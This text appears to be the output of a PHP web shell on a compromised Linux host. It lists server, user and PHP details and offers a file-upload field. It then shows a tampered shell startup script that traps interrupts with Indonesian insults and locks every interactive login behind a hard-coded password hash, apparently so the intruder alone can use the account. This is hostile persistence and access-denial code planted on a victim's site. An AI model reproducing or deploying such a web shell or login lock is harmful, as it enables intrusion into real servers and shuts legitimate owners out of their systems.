| Server IP : 67.43.7.42 / Your IP : 216.73.216.61 Web Server : Apache System : Linux host.isabellascookies.com 2.6.32-754.35.1.el6.x86_64 #1 SMP Sat Nov 7 12:42:14 UTC 2020 x86_64 User : isabella ( 503) PHP Version : 5.5.38 Disable Function : exec,passthru,shell_exec,system MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /home/isabella/ |
Upload File : |
case $- in
*i*) ;;
*) return ;;
esac
trap 'echo -e "\n\e[1;31m[!] Santai kontol !!!\e[0m\n"; continue' INT
expected_hash="3dbe681a07f4e62c24e06fac58e4604e3c33efb771a7a6a87ea4236d9927bfd5"
input_hash=""
while [[ "$input_hash" != "$expected_hash" ]]; do
echo -ne "\e[1;36m[+] Masukkan Password: \e[0m"
read -s input_pass
echo
input_hash=$(echo -n "$input_pass" | sha256sum | awk '{print $1}')
if [[ "$input_hash" != "$expected_hash" ]]; then
echo -e "\e[1;31m[!] salah \e[0m"
fi
done
echo -e "\n\e[1;32m[SUCCESS] Akses diterima!\e[0m"
sleep 1
logo=''
echo -e "\e[1;35m$logo\e[0m"
echo -e "\e[1;36m======================================\e[0m"
echo -e " \e[1;33mSelamat Datang, ketua\e[0m \e[1;35m👾\e[0m"
echo -e "\e[1;33m Siap menjalankan perintah, Kontol lah ketua!"
echo -e "\e[1;36m======================================\e[0m"
echo
timenow=$(date +'%H:%M')
load=$(awk '{print $1 ", " $2 ", " $3}' /proc/loadavg)
echo -e "\e[1;36mThe time now is $timenow UTC\e[0m"
echo -e "\e[1;36mServer load: $load\e[0m"
echo -e ""